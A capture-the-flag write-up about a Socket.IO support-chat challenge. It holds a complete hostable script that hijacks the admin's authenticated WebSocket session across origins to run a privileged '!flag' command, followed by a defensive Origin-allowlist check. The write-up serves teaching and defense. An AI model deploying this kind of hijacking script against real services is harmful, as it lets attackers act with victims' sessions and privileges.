Tags: socket.io csrf web 


First, we can register with any username/password combo.

Then, we are presented with a chatbot:

Bot: Welcome to the support chat! An admin will be assisting you.

If we look at the source code of the site, we find that it is based on Socket.IO.

Trying to impersonate another user (by changing the `room` that is sent to the server) does not work since it looks like the server validates our cookie before it lets us join.

Now, let's try to enumerate the things that the chatbot lets us do.

We try to spam some random things:
User: random
Admin: Sorry, I can't help you if you don't provide context. Where is the error happening?

We also notice that there is a `!flag` command:

User: !flag
Bot: Only the admin can run that command from our office

This implies that part of the vulnerability will involve some kind of XSS or CSRF.

After trying a few random guesses, we notice that putting a link in causes the admin to try to visit that link:
User: https://example.com
Admin: I am looking into https://example.com give me a moment...

Thus, the vulnerability is probably something to do with CSRF.

We can try just connecting to the Socket.IO server from another origin, which does work.

So now all we need to do is to host a page with a script that joins the admin's room and runs `!flag`:
<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
// Connect to the challenge's Socket.IO namespace from our own origin
let socket = io('http://six.jh2i.com:50022/test');

const username = 'admin';

socket.on('connect', () => {
  // Join the admin's room (the admin's browser sends their session cookie)
  socket.emit('join', {
    room: username
  });
  // Send the privileged command from inside that room
  socket.emit('my_room_event', {
    data: '!flag',
    room: username
  });
});
</script>

After giving the admin the URL, we see the flag magically come back to us in the chatroom.
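The root cause is a handshake that checks the session cookie but never the browser's Origin header, so any page the admin visits can open an authenticated connection. As an added example (not the writeup's or the challenge's code), here is the exact-origin allowlist check a server would need, run over constructed sample handshakes; the allowlisted origin is taken from the URL quoted above and the attacker origin is made up.

```javascript
// Added example (not the writeup's or the challenge's code): the handshake above
// checks the session cookie but never the browser's Origin header.
// Allowlist is constructed from the URL quoted in the writeup.
const ALLOWED_ORIGINS = new Set(['http://six.jh2i.com:50022']);

// Exact-origin comparison. URL#origin normalises scheme, host case and port, so
// 'http://six.jh2i.com:50022/' and 'HTTP://SIX.JH2I.COM:50022' both match, while
// prefix/substring matching would let 'http://six.jh2i.com.attacker.example' through.
function isAllowedOrigin(originHeader, allowed = ALLOWED_ORIGINS) {
  // Fail closed: browsers always send Origin on WebSocket/XHR handshakes, and the
  // opaque 'null' origin (sandboxed iframes, data: URLs) is never trustworthy.
  if (typeof originHeader !== 'string' || originHeader === 'null') return false;
  let parsed;
  try {
    parsed = new URL(originHeader);
  } catch (e) {
    return false;
  }
  return allowed.has(parsed.origin);
}

// Decision for one handshake. `req` mirrors the shape engine.io hands to its
// `allowRequest(req, callback)` hook (a headers object); only Origin is consulted.
function decideHandshake(req) {
  const origin = req.headers.origin;
  if (isAllowedOrigin(origin)) return { allow: true, reason: 'origin allowlisted' };
  return { allow: false, reason: `origin rejected: ${origin === undefined ? '<missing>' : origin}` };
}

// Constructed sample handshakes: the real site, an attacker page like the one the
// writeup hosts, and a non-browser client with no Origin at all.
const SAMPLE_HANDSHAKES = [
  { headers: { origin: 'http://six.jh2i.com:50022', cookie: 'session=abc' } },
  { headers: { origin: 'http://attacker.example', cookie: 'session=abc' } },
  { headers: { cookie: 'session=abc' } },
];

// Returns the decisions in order; a defender would log the denied ones.
function auditHandshakes(requests = SAMPLE_HANDSHAKES) {
  return requests.map(decideHandshake);
}

// Wiring point (not executed here): Socket.IO 2.x exposes
//   io.origins((origin, cb) => cb(isAllowedOrigin(origin) ? null : 'origin not allowed',
//                                 isAllowedOrigin(origin)));
// Socket.IO 3+/4 takes `cors: { origin: [...ALLOWED_ORIGINS] }` in the Server options.
console.log(auditHandshakes());
```

Only the first sample handshake is allowed; the attacker page and the Origin-less client are both rejected, which is what stops the hosted script above from riding on the admin's cookie.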